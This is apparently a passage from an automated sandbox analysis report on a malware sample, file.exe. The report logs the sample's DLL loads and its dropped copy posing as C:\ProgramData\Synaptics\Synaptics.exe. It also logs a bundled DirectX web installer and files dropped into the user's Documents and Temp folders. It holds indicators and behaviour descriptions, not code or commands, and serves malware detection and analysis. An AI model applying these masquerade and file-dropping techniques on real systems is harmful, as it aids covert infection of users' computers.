                          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: twext.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: cscapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: shacct.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: twinapi.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: idstore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: samlib.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: starttiledata.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: acppage.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: msi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: aepic.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wlidprov.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: provsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: twext.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: starttiledata.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: acppage.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: msi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: aepic.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: acgenral.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: advpack.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: acgenral.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: advpack.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: devrtl.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: spinf.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: drvstore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: spfileq.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: cabinet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: inseng.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: ieadvpack.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\sY99VLt.iniJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeWindow found: window name: SysTabControl32Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeWindow detected: Installing Microsoft(R) DirectX(R)Welcome to setup for DirectXThe DirectX setup wizard guides you through installation of DirectX Runtime Components. Please read the following license agreement. Press the PAGE DOWN key to see the rest of the agreement. You must accept the agreement to continue the setup.MICROSOFT SOFTWARE LICENSE TERMSMICROSOFT DIRECTX END USER RUNTIMEThese license terms are an agreement between Microsoft Corporation (or based on where you live one of its affiliates) and you. Please read them. They apply to the software named above which includes the media on which you received it if any. The terms also apply to any Microsoft* updates* supplements* Internet-based services and * support servicesfor this software unless other terms accompany those items. If so those terms apply.BY USING THE SOFTWARE YOU ACCEPT THESE TERMS. IF YOU DO NOT ACCEPT THEM DO NOT USE THE SOFTWARE.If you comply with these license terms you have the rights below.1. INSTALLATION AND USE RIGHTS. You may install and use any number of copies of the software on your devices.2. SCOPE OF LICENSE. The software is licensed not sold. This agreement only gives you some rights to use the software. Microsoft reserves all other rights. Unless applicable law gives you more rights despite this limitation you may use the software only as expressly permitted in this agreement. In doing so you must comply with any technical limitations in the software that only allow you to use it in certain ways. You may not* work around any technical limitations in the software;* reverse engineer decompile or disassemble the software except and only to the extent that applicable law expressly permits despite this limitation;* make more copies of the software than specified in this agreement or allowed by applicable law despite this limitation;* publish the software for others to copy;* rent lease or lend the software;* transfer the software or this agreement to any third party; or* use the software for commercial software hosting services.3. BACKUP COPY. You may make one backup copy of the software. You may use it only to reinstall the software.4. DOCUMENTATION. Any person that has valid access to your computer or internal network may copy and use the documentation for your internal reference purposes.5. EXPORT RESTRICTIONS. The software is subject to United States export laws and regulations. You must comply with all domestic and international export laws and regulations that apply to the software. These laws include restrictions on destinations end users and end use. For additional information see www.microsoft.com/exporting.6. SUPPORT SERVICES. Because this software is as is we may not provide support services for it.7. ENTIRE AGREEMENT. This agreement and the terms for supplements updates Internet-based services and support services that you use are the entire agreement for the software and support services.8. APPLICABLE LAW.a. United States. If you acquired the s
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                          Source: file.exeStatic file information: File size 1059840 > 1048576
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
                          Source: Binary string: wextract.pdb source: file.exe, ._cache_file.exe.0.dr
                          Source: Binary string: dxwsetup.pdb source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000000.2043761767.0000000000D91000.00000020.00000001.01000000.00000007.sdmp
                          Source: Binary string: wextract.pdbU source: file.exe, ._cache_file.exe.0.dr
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_0100198B LocalFree,RegCreateKeyExA,wsprintfA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,lstrlenA,lstrlenA,lstrlenA,LocalAlloc,GetModuleFileNameA,RegCloseKey,wsprintfA,lstrlenA,RegSetValueExA,RegCloseKey,LocalFree,2_2_0100198B

                          Persistence and Installation Behavior

                          barindex
                          Drops PE files to the document folder of the user
                          Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\BJZFPPWAPT\~$cache1Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\dsetup32.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\dsetup.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxupdate.dllJump to dropped file
                          Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dsetup.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\SET1013.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\SETFF3.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\._cache_file.exeJump to dropped file
                          Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\BJZFPPWAPT\~$cache1Jump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\Synaptics\RCXE9B.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dsetup32.dllJump to dropped file
                          Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\Synaptics\RCXE9B.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\dsetup32.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\dsetup.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\SET1013.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\SETFF3.tmpJump to dropped file
                          Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\BJZFPPWAPT\~$cache1Jump to dropped file
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010022FF LocalFree,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcmpiA,lstrcmpiA,lstrlenA,lstrlenA,lstrlenA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,lstrcpyA,lstrcpyA,GetShortPathNameA,wsprintfA,lstrcmpiA,lstrlenA,lstrlenA,lstrlenA,LocalAlloc,wsprintfA,LocalAlloc,GetFileAttributesA,lstrcpyA,lstrcatA,lstrcatA,lstrcpyA,2_2_010022FF
